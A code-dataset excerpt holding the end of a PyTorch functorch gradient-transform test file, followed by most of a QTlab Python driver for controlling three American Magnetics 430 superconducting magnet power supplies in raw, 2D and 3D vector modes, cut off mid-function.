module.num_features), module.num_features, affine=True)\n\n def convert_batchnorm_modules(\n model: nn.Module,\n converter: Callable[\n [nn.modules.batchnorm._BatchNorm], nn.Module\n ] = _batchnorm_to_groupnorm,\n ) -> nn.Module:\n return replace_all_modules(model, nn.modules.batchnorm._BatchNorm, converter)\n\n import torchvision.models as models\n model = convert_batchnorm_modules(models.resnet18(num_classes=10)).to(device)\n criterion = nn.CrossEntropyLoss()\n\n func_model, weights = make_functional(model)\n\n def compute_loss(weights, image, target):\n images = image.unsqueeze(0)\n targets = target.unsqueeze(0)\n output = func_model(weights, images)\n loss = criterion(output, targets)\n return loss\n\n batch_size = 3\n images = torch.randn(batch_size, 3, 32, 32, device=device)\n targets = torch.randint(0, 10, (batch_size,), device=device)\n\n result_grads = vmap(grad(compute_loss), in_dims=(None, 0, 0))(weights, images, targets)\n\n expected_grads = [\n torch.autograd.grad(compute_loss(weights, images[i], targets[i]), weights)\n for i in range(batch_size)\n ]\n expected_grads = [torch.stack(shards) for shards in zip(*expected_grads)]\n\n self.assertEqual(result_grads, expected_grads)\n\nonly_for = (\"cpu\", \"cuda\")\ninstantiate_device_type_tests(\n TestGradTransform,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestVmapOfGrad,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestJacrev,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestComposability,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestExamplesCorrectness,\n globals(),\n only_for=only_for,\n)\n\n\n\nif __name__ == '__main__':\n run_tests()\n","sub_path":"test/test_eager_transforms.py","file_name":"test_eager_transforms.py","file_ext":"py","file_size_in_byte":39259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451456303","text":"# QTlab driver for American Magnetics 430 magnet power supply.\n# This version controls 3 solenoids and uses three instances of AMI430_single for that.\n# For a single solenoid, use AMI430_single.\n# For 2D vector operation, use AMI430_2D.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the 
License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nfrom instrument import Instrument\nimport instruments\nimport qt\nimport types\nimport socket\nimport logging\nimport time\nfrom math import *\nfrom numpy import *\n\nclass AMI430_3D(Instrument):\n \n #Global parameters\n #Important:\n #Set these values in accordance with the limits of each system\n #otherwise magnet quench or damage of equipment might occur\n \n #ratio between current and magnetic field\n COILCONSTANT_X = 0.0146 #T/A\n COILCONSTANT_Y = 0.0426 #T/A\n COILCONSTANT_Z = 0.1107 #T/A\n \n #Rated operating current in A, from spec sheet. A margin of 0.03A is added so that the rated fields fit in.\n #If the magnet quenches regularly, reduce these values!!!!\n CURRENTRATING_X = 68.53 #A\n CURRENTRATING_Y = 70.45 #A\n CURRENTRATING_Z = 81.33 #A\n \n #Rated magnetic field based on the two previous values\n #Note: in many cases, the vector operation is only allowed in a smaller range\n #Set the last value accordingly \n FIELDRATING_X = COILCONSTANT_X*CURRENTRATING_X #T\n FIELDRATING_Y = COILCONSTANT_Y*CURRENTRATING_Y #T\n FIELDRATING_Z = COILCONSTANT_Z*CURRENTRATING_Z #T\n FIELDRATING_XY = 1.0 #T\n FIELDRATING_XZ = 1.0\n FIELDRATING_YZ = 3.0\n FIELDRATING_XYZ = 1.0\n \n #Maximum ramp limits from datasheet\n CURRENTRAMPLIMIT_X = 0.2 #A/s\n CURRENTRAMPLIMIT_Y = 0.05 #A/s\n CURRENTRAMPLIMIT_Z = 0.08 #A/s\n FIELDRAMPLIMIT_X=COILCONSTANT_X*CURRENTRAMPLIMIT_X #T/s\n FIELDRAMPLIMIT_Y=COILCONSTANT_Y*CURRENTRAMPLIMIT_Y #T/s\n FIELDRAMPLIMIT_Z=COILCONSTANT_Z*CURRENTRAMPLIMIT_Z #T/s\n \n #Persistent switch rated currents. \n #These values are based on the autodetect function of the supply unit\n #typical values are ~50mA for wet systems and ~30mA for dry systems\n PSCURRENT_X=50 #mA\n PSCURRENT_Y=50 #mA\n PSCURRENT_Z=50 #mA\n \n #Heat and cooldown time for persistent switch\n PSHEATTIME_X=20 #s\n PSHEATTIME_Y=20 #s\n PSHEATTIME_Z=20 #s\n PSCOOLTIME_X=20 #s\n PSCOOLTIME_Y=20 #s\n PSCOOLTIME_Z=20 #s\n \n #soft parameters\n _mode=0x01\n _alpha=0.0\n _phi=0.0\n \n #soft parameters related to field offset\n _offseten=False\n _fieldoffset=0.0\n _alphaoffset=0.0\n _phioffset=0.0\n _field=0.0 \n\n #global parameter for the presence of persistent switch. Default is True.\n #Check your magnet configuration!\n PSWPRESENT_X=True\n PSWPRESENT_Y=True\n PSWPRESENT_Z=True\n \n #operation mode\n '''\n Available modes:\n \n MODE_RAW: individual magnets can be accessed directly. 
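    (The mode constants are one-hot bit flags, 0x01 through 0x80, so the
    driver tests membership with bitwise AND. A sketch of the idiom used
    throughout _create_parameters below, continuing into the per-mode
    descriptions that follow:

        mode = AMI430_3D.MODE_XY
        if mode & (AMI430_3D.MODE_XY | AMI430_3D.MODE_XYZ):
            pass  # e.g. expose the settable 'alpha' angle parameter
    )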
\n \n MODE_X: only X magnet is driven, Y, Z magnets are at zero.\n \n MODE_Y: only Y magnet is driven, X, Z magnets are at zero.\n \n MODE_Z: only Z magnet is driven, X, Y magnets are at zero.\n \n MODE_XY: 2D vector operation, field amplitude and alpha can be set.\n \n MODE_XZ: 2D vector operation, field amplitude and phi can be set.\n \n MODE_YZ: 2D vector operation, field amplitude and phi can be set.\n \n MODE_XYZ: 3D vector operation, field amplitude and alpha,phi can be set.\n \n '''\n MODE_RAW=0x01\n MODE_X=0x02\n MODE_Y=0x04\n MODE_Z=0x08\n MODE_XY=0x10\n MODE_XZ=0x20\n MODE_YZ=0x40\n MODE_XYZ=0x80\n\n ###Init\n ###Parameters for each axis:\n #address: IP address of magnet controller. Has to be set on front panel. \n #port: TCP port of magnet controller. Should be 7180\n #switchPresent: determines if driver handles persistent switch or not. Check\n # your magnet configuration! Default is yes. Has to be forwarded to\n # global parameter PSWPRESENT\n \n \n def __init__(self, name, addressX='192.168.2.3', addressY='192.168.2.2', addressZ='192.168.2.1', portX=7180, portY=7180, portZ=7180, mode=MODE_RAW, switchPresent_X=True, switchPresent_Y=True, switchPresent_Z=True):\n \n Instrument.__init__(self, name, tags=['measure'])\n \n #pass switchPresent_{X,Y,Z} to their global parameter\n self.PSWPRESENT_X=switchPresent_X\n self.PSWPRESENT_Y=switchPresent_Y\n self.PSWPRESENT_Z=switchPresent_Z\n \n self._create_parameters(mode)\n \n self.set_mode(mode, init=True)\n \n #We create the underlying instances of AMI430_single\n \n self._channelX=qt.instruments.create(name + '_X', 'AMI430_single', address=addressX, port=portX, switchPresent=switchPresent_X)\n self._channelY=qt.instruments.create(name + '_Y', 'AMI430_single', address=addressY, port=portY, switchPresent=switchPresent_Y)\n self._channelZ=qt.instruments.create(name + '_Z', 'AMI430_single', address=addressZ, port=portZ, switchPresent=switchPresent_Z)\n \n #and override the limits for each channel\n self._channelX.set_parameter_bounds('field', -self.FIELDRATING_X, self.FIELDRATING_X)\n self._channelX.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_X)\n \n self._channelY.set_parameter_bounds('field', -self.FIELDRATING_Y, self.FIELDRATING_Y)\n self._channelY.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_Y)\n\n self._channelZ.set_parameter_bounds('field', -self.FIELDRATING_Z, self.FIELDRATING_Z)\n self._channelZ.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_Z)\n \n self.add_function('reset')\n\n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_function('rampToX')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_function('rampToY')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_function('rampToZ')\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_function('resetQuenchX')\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_function('resetQuenchY')\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_function('resetQuenchZ')\n \n self.get_all()\n \n def reset(self): ###TODO\n pass\n \n def _create_parameters(self, mode):\n \n if 'mode' not in self.get_parameter_names(): #only create it once\n self.add_parameter('mode', type=types.IntType,\n flags=Instrument.FLAG_GETSET,\n format_map={self.MODE_RAW:'Raw mode',\n self.MODE_X:'X magnet',\n self.MODE_Y:'Y magnet',\n self.MODE_Z:'Z magnet',\n self.MODE_XY:'XY magnet',\n self.MODE_XZ:'XZ 
magnet',\n self.MODE_YZ:'YZ magnet',\n self.MODE_XYZ:'XYZ magnet'})\n \n if self.PSWPRESENT_X & (mode & (self.MODE_RAW | self.MODE_X)): \n self.add_parameter('pSwitchX', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'})\n \n if self.PSWPRESENT_Y & (mode & (self.MODE_RAW | self.MODE_Y)):\n self.add_parameter('pSwitchY', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n \n if self.PSWPRESENT_Z & (mode & (self.MODE_RAW | self.MODE_Z)):\n self.add_parameter('pSwitchZ', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n\n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_parameter('fieldX', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_X, maxval=self.FIELDRATING_X,\n format='%.6f')\n elif mode & (self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('fieldX', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_parameter('fieldY', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_Y, maxval=self.FIELDRATING_Y,\n format='%.6f')\n elif mode & (self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('fieldY', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_parameter('fieldZ', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_Z, maxval=self.FIELDRATING_Z,\n format='%.6f')\n elif mode & (self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('fieldZ', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & self.MODE_XY:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XY,\n format='%.6f')\n elif mode & self.MODE_XZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XZ,\n format='%.6f')\n elif mode & self.MODE_YZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_YZ,\n format='%.6f')\n elif mode & self.MODE_XYZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_SET | Instrument.FLAG_GET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XYZ,\n format='%.6f')\n \n if mode & (self.MODE_XY | self.MODE_XYZ):\n self.add_parameter('alpha', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n \n if mode & (self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('phi', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n \n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_parameter('setPointX', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_parameter('setPointY', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_parameter('setPointZ', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | 
self.MODE_XYZ):\n self.add_parameter('rampRateX', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_X, format='%.5f') \n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampRateY', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_Y, format='%.5f')\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampRateZ', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_Z, format='%.5f')\n\n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('rampStateX', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'}) \n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampStateY', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'})\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampStateZ', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'})\n\n if self.PSWPRESENT_X & (mode & (self.MODE_RAW | self.MODE_X)):\n self.add_parameter('persistentX', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if self.PSWPRESENT_Y & (mode & (self.MODE_RAW | self.MODE_Y)):\n self.add_parameter('persistentY', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if self.PSWPRESENT_Z & (mode & (self.MODE_RAW | self.MODE_Z)):\n self.add_parameter('persistentZ', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('quenchX', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('quenchY', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n \n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('quenchZ', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n\n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('errorX', type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('errorY', type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('errorZ', 
type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & self.MODE_XYZ:\n self.add_parameter('offsetEnabled', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n \n def get_all(self):\n for p in self.get_parameter_names():\n self.get(p)\n\n #mode of operation \n \n def do_get_mode(self):\n return self._mode\n\n #if the new mode is the same as earlier, then nothing happens\n #otherwise we ramp the magnets to zero\n #and add & remove parameters as needed\n \n def do_set_mode(self, mode, init=False):\n if init or (self.get_mode() == mode):\n return True\n else:\n self._channelX.set_field(0.0)\n self._channelY.set_field(0.0)\n self._channelZ.set_field(0.0)\n if self.PSWPRESENT_X:\n self._channelX.set_pSwitch(False)\n if self.PSWPRESENT_Y:\n self._channelY.set_pSwitch(False)\n if self.PSWPRESENT_Z:\n self._channelZ.set_pSwitch(False)\n self._mode=mode\n for p in self.get_parameter_names(): #it is probably not safe to remove the parameter in set_parameter\n if p != 'mode':\n self.remove_parameter(p)\n self._create_parameters(mode)\n self.get_all() \n return True\n\n #Actual parameters implemented\n #First, we define the wrapper functions to access the individual magnets\n \n def do_get_pSwitchX(self):\n if not self.PSWPRESENT_X:\n return False\n return self._channelX.get_pSwitch()\n \n def do_get_pSwitchY(self):\n if not self.PSWPRESENT_Y:\n return False\n return self._channelY.get_pSwitch()\n\n def do_get_pSwitchZ(self):\n if not self.PSWPRESENT_Z:\n return False\n return self._channelZ.get_pSwitch()\n \n def do_set_pSwitchX(self, value):\n if not self.PSWPRESENT_X:\n logging.error(__name__ +': No persistent switch present on X magnet')\n return False\n return self._channelX.set_pSwitch(value)\n \n def do_set_pSwitchY(self, value):\n if not self.PSWPRESENT_Y:\n logging.error(__name__ +': No persistent switch present on Y magnet')\n return False\n return self._channelY.set_pSwitch(value)\n\n def do_set_pSwitchZ(self, value):\n if not self.PSWPRESENT_Z:\n logging.error(__name__ +': No persistent switch present on Z magnet')\n return False\n return self._channelZ.set_pSwitch(value)\n \n def do_get_rampStateX(self):\n return self._channelX.get_rampState()\n \n def do_get_rampStateY(self):\n return self._channelY.get_rampState()\n\n def do_get_rampStateZ(self):\n return self._channelZ.get_rampState()\n \n def do_get_fieldX(self):\n return self._channelX.get_field()\n \n def do_set_fieldX(self, value):\n return self._channelX.set_field(value)\n \n def do_get_fieldY(self):\n return self._channelY.get_field()\n \n def do_set_fieldY(self, value):\n return self._channelY.set_field(value)\n\n def do_get_fieldZ(self):\n return self._channelZ.get_field()\n \n def do_set_fieldZ(self, value):\n return self._channelZ.set_field(value)\n \n def do_get_setPointX(self):\n return self._channelX.get_setPoint()\n \n def do_get_setPointY(self):\n return self._channelY.get_setPoint()\n\n def do_get_setPointZ(self):\n return self._channelZ.get_setPoint()\n\n def do_get_rampRateX(self):\n return self._channelX.get_rampRate()\n \n def do_set_rampRateX(self, value):\n return self._channelX.set_rampRate(value)\n \n def do_get_rampRateY(self):\n return self._channelY.get_rampRate()\n \n def do_set_rampRateY(self, value):\n return self._channelY.set_rampRate(value)\n\n def do_get_rampRateZ(self):\n return self._channelZ.get_rampRate()\n \n def do_set_rampRateZ(self, value):\n return self._channelZ.set_rampRate(value)\n \n def do_get_persistentX(self):\n if not 
self.PSWPRESENT_X:\n return False\n return self._channelX.get_persistent()\n \n def do_set_persistentX(self, value):\n if not self.PSWPRESENT_X:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of X magnet')\n return False\n return self._channelX.set_persistent(value)\n\n def do_get_persistentY(self):\n if not self.PSWPRESENT_Y:\n return False\n return self._channelY.get_persistent()\n \n def do_set_persistentY(self, value):\n if not self.PSWPRESENT_Y:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of Y magnet')\n return False\n return self._channelY.set_persistent(value)\n\n def do_get_persistentZ(self):\n if not self.PSWPRESENT_Z:\n return False\n return self._channelZ.get_persistent()\n \n def do_set_persistentZ(self, value):\n if not self.PSWPRESENT_Z:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of Z magnet')\n return False\n return self._channelZ.set_persistent(value)\n \n def do_get_quenchX(self):\n return self._channelX.get_quench()\n \n def do_get_quenchY(self):\n return self._channelY.get_quench()\n\n def do_get_quenchZ(self):\n return self._channelZ.get_quench()\n\n def do_get_errorX(self):\n return self._channelX.get_error()\n \n def do_get_errorY(self):\n return self._channelY.get_error()\n\n def do_get_errorZ(self):\n return self._channelZ.get_error()\n \n def rampToX(self, value):\n if self.get_mode() & (self.MODE_RAW | self.MODE_X):\n return self._channelX.rampTo(value)\n else:\n return False\n \n def rampToY(self, value):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Y):\n return self._channelY.rampTo(value)\n else:\n return False\n\n def rampToZ(self, value):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Z):\n return self._channelZ.rampTo(value)\n else:\n return False\n \n def resetQuenchX(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n return self._channelX.resetQuench()\n else:\n return False \n\n def resetQuenchY(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n return self._channelY.resetQuench()\n else:\n return False \n \n def resetQuenchZ(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n return self._channelZ.resetQuench()\n else:\n return False\n \n def do_get_field(self):\n if self.get_mode() == self.MODE_XY:\n return math.hypot(self.get_fieldX(), self.get_fieldY())\n elif self.get_mode() == self.MODE_XZ:\n return math.hypot(self.get_fieldX(), self.get_fieldZ())\n elif self.get_mode() == self.MODE_YZ:\n return math.hypot(self.get_fieldY(), self.get_fieldZ())\n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n return self._field\n else:\n self._field=math.hypot(math.hypot(self.get_fieldX(), self.get_fieldY()),self.get_fieldZ())\n return self._field\n else:\n return False\n \n def do_set_field(self, value):\n if self.get_mode() == self.MODE_XY:\n a=math.radians(self.get_alpha())\n return self._channelX.set_field(value*math.cos(a)) and self._channelY.set_field(value*math.sin(a))\n elif self.get_mode() == self.MODE_XZ:\n f=math.radians(self.get_phi())\n return self._channelX.set_field(value*math.sin(f)) and self._channelZ.set_field(value*math.cos(f))\n elif self.get_mode() == self.MODE_YZ:\n f=math.radians(self.get_phi())\n return self._channelY.set_field(value*math.sin(f)) and self._channelZ.set_field(value*math.cos(f))\n elif self.get_mode() == 
self.MODE_XYZ:\n if self._offseten:\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+value*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+value*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+value*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._field=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying field in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n f=math.radians(self._phi)\n a=math.radians(self._alpha)\n Bx=value*math.sin(f)*math.cos(a)\n By=value*math.sin(f)*math.sin(a)\n Bz=value*math.cos(f)\n self._field=value\n return self._sweepFieldsXYZ(Bx, By, Bz)\n else: \n return False\n \n # We do it in the safe way: always do the ramp down first,\n # and only ramp up the other axis afterwards\n # this results in some performance penalty compared to\n # a straight simultaneous ramp to the new value \n \n def do_get_alpha(self):\n return self._alpha\n \n def do_set_alpha(self, value):\n if self.get_mode() == self.MODE_XY:\n B=self.get_field()\n a=math.radians(value)\n oldX=self.get_fieldX()\n newX=B*math.cos(a)\n newY=B*math.sin(a)\n self._alpha=value \n if math.fabs(newX) < math.fabs(oldX):\n return self._channelX.set_field(newX) and self._channelY.set_field(newY)\n else:\n return self._channelY.set_field(newY) and self._channelX.set_field(newX)\n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n a=math.radians(value)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXY(Bxtot, Bytot):\n self._alpha=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying alpha in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n B=self.get_field()\n a=math.radians(value)\n f=math.radians(self._phi)\n newX=B*math.cos(a)*sin(f)\n newY=B*math.sin(a)*sin(f)\n if self._sweepFieldsXY(newX, newY):\n self._alpha=value\n return True\n else:\n logging.error(__name__ + ': Error while applying alpha')\n return False \n else:\n return False\n \n def do_get_phi(self):\n return self._phi\n \n def do_set_phi(self, value):\n if self.get_mode() == self.MODE_XZ:\n B=self.get_field()\n f=math.radians(value)\n oldX=self.get_fieldX()\n newX=B*math.sin(f)\n newZ=B*math.cos(f)\n self._phi=value\n if math.fabs(newX) < math.fabs(oldX):\n return self._channelX.set_field(newX) and self._channelZ.set_field(newZ)\n else:\n return self._channelZ.set_field(newZ) and self._channelX.set_field(newX) \n elif self.get_mode() == self.MODE_YZ:\n B=self.get_field()\n f=math.radians(value)\n oldY=self.get_fieldY()\n newY=B*math.sin(f)\n newZ=B*math.cos(f)\n self._phi=value\n if math.fabs(newY) < math.fabs(oldY):\n return self._channelY.set_field(newY) and self._channelZ.set_field(newZ)\n else:\n 
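# illustrative numbers (added, not from the original): moving phi from 0 to\n # 90 degrees at B = 1 T gives |newY| = 1.0 > |oldY| = 0.0, so this branch\n # ramps Z down towards zero before ramping Y up; the combined field\n # magnitude therefore never exceeds B during the move\n 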
return self._channelZ.set_field(newZ) and self._channelY.set_field(newY) \n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(value)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._phi=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying phi in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n B=self.get_field()\n a=math.radians(self._alpha)\n f=math.radians(value)\n newZ=B*math.cos(f)\n newX=B*math.cos(a)*math.sin(f)\n newY=B*math.sin(a)*math.sin(f)\n if self._sweepFieldsXYZ(newX, newY, newZ):\n self._phi=value\n return True\n else:\n logging.error(__name__ + ': Error while applying phi')\n return False\n else:\n return False\n \n def do_get_offsetEnabled(self):\n return self._offseten\n \n def do_set_offsetEnabled(self, value):\n if value:\n if self.get_offsetEnabled():\n return True\n else:\n self._fieldoffset=0.0\n self._alphaoffset=0.0\n self._phioffset=0.0\n self._offseten=True\n self.add_parameter('offsetField', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n format='%.6f')\n self.add_parameter('offsetAlpha', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n self.add_parameter('offsetPhi', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n self.add_parameter('totalField', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n self.add_parameter('totalAlpha', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='degree',\n format='%.3f')\n self.add_parameter('totalPhi', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='degree',\n format='%.3f')\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n self.get_offsetField()\n self.get_offsetAlpha()\n self.get_offsetPhi()\n return True\n else:\n if self.get_offsetEnabled():\n self._offseten=False\n 